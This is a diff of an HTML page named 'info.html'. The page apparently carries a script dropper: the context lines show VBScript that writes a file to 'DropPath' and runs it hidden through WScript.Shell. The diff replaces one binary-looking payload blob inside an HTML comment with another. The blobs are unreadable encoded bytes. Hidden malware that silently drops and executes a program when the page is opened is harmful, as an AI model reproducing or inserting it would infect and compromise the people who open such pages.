--- a/info.html
+++ b/info.html
@@ -116,7 +116,5 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--&Ú\ËÏ´“×Ä®ÝØÐ'ÒRð!=ô6-Æ·GÚŠI…ëË|ÜàÝuwÞL³¢åBD&«7¢¯•ŸÉSjÒˆˆW¿ujuµ@¼Œü²À¬€ju^’Æ0žÅåã¯ÀÔ`ó&¥4zFî|£±”ü.@-
-<¶Ë?„IjÀ=Å•…R–coœ…fÌœ®E.£&Ù”Ò B,ÂB·»>Úè´ÊÀšÌŠWäNˆõ[:ìiö3ƒËöÄÚI«ïÝYðwK²R©jÉ€}ÈáQDÓ˜õ3µ!•Ú°…8÷’OWWÆé›ïà»E±˜’PL^>™
->Âû'èWûc'Ç¬ŸÉ…=	%[L<žxñ"my8é/¤u|[ÄXJ¢"Ã„–þ`‰kèôx¢óñ·²³H˜l¬š¿†òÏ‡œÁ3ÇÃïxûx:maèr ½qN±W‰mºÔM§­4‰
-/ÜÔ¼RÀ´Óme2zæX²‡<)@Y>-lÞxkƒâ<€7¤y;ˆØÇƒ>€p`øcè{)p, .t‚Ü â¾x4cÍÔ}4jôý‰ á(R"3ùá(á(á(¬õO÷ÛûZÌï( á(-->
+//--></SCRIPT><!--ßŸc…¿4Bœ|œRuƒ«7¢ÙôQ"¨¸!=ßut€o.qÁr-¤÷µÈk¾ºý„;gÑÅ¹tœaì!å¡½9a’,wC4šÆÇèãâb‚uKõ¹Í~Š0âk@—¹¶õ‰|º'ËÛ|>ù~nâ»ÚZ¢ÇËê"mÈì/ÂeÐ{-û5¼ç_*aÛ7|­5éds\6Ö2ñm¸»ú4Õ“J<–£¾Éçy/±ûhíŸ"1ì†oRýµïÙ5ËÜ`\ƒ+>6Žyi÷\}"!Ýq×
+ªî¥©pb9Žþ6¬Q’Œç³(ÉÂôšNï ‰0êˆr}dùÖ}£e¹(ÚÊÂ+š+@ù©/×<BEW”ˆ&¸×÷Â€{ç-ðh<Oäì Œ¿/ºàeHÜ9ðm»cŠLÏŒÚw\-{îks¾9äÇU4(³>¶³CÌ’öZu7ÉníiAöv÷èJ÷Ùì*G£—}Õ§Ôµv…Kšð´Úr5R–uòÃ‚ã™©«#MZ”ØÔ@ áêR"ñøáêáêáê¬7N€½?[Ìïê áê-->
